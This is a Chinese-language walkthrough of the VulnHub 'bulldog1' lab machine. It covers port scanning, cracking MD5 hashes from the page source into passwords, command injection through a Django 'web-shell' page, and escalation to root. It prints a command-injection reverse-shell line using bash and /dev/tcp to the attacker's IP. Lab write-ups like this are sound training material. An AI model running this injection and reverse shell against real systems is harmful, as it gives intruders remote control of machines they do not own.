vulnhub靶场,bulldog1
环境准备
靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/
攻击机:kali(192.168.109.128)
靶机:bulldog1(192.168.109.157)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
信息收集
使用arp-scan确定目标靶机
确定目标靶机IP为192.168.109.157
使用nmap扫描查看目标靶机端口开放情况
开放端口:23、80、8080
可以开到目标靶机将ssh端口换成了23
浏览器访问目标靶机80端口
翻译其中内容是说此网站已经被黑了,查看源代码也没有发现什么
点击Public Notice跳转到了另一个页面
查看源代码也没有发现什么
网站指纹识别
使用dirb进行网站目录结构扫描
先只观察一下一级目录,访问/admin
网页
看来是Django的后台管理登录页面,使用暴力破解和SQL注入均无效
访问/dev
网页
中间有个web-shell,点击试试
看来必须要登入后台才能进入这个页面,回到上个页面,翻译一下
这里说不确定黑客有没有留下什么痕迹,可能是在提醒我们,看看源代码里面有没有什么东西
果然在源代码里发现了一些加密后的数据,猜测使用了md5进行加密
渗透过程
将这个md5加密后的密文放到解密网站依次进行猜解
成功破解出两个密码,再根据源码前面的对应关系得到两个账号密码,分别是:nick:bulldog,sarah:bulldoglover
再次找到后台登录的地方,使用这两个账号试试能不能登录
可以看到nick用户成功登入后台
再次回到那个webshell的位置
看来这里应该是一个命令执行的位置,输出上面给的命令试试
确实是这样,那可以试着加管道符运行我们想运行的命令
可以看到,运行成功了,那现在就可以反弹shell了
kali终端:
靶机中:
ls&echo "bash -i >& /dev/tcp/192.168.109.128/4444 0>&1" | bash
可以看到kali这边成功反弹回来了一个shell
提权过程
查看用户的sudo权限
没有sudo权限,进入家目录
发现一个bulldogadmin文件,进去看看
又发现一个.hiddenadmindirectory文件
再进去看看
又发现了一个customPermissionApp文件,查看其内容
发现一堆乱码,用strings命令用来提取和显示非文本文件中的文本字符串
猜测可能是密码,应为SUPER、 ulitimate、PASSWORD、youCANTget
, 可以把他们连到一起正好是SUPERultimatePASSWORDyouCANTget
,H是来混淆的,中间刚好有PADDWORD
使用su命令切换为root用户
这里发现不能使用su命令,这里报的错误是必须要从终端运行,那使用python打开一个新的终端,使用sudo -i
命令试试
可以看到成功切换为root用户,查看当前文件夹,成功获得flag,靶机bulldog1渗透结束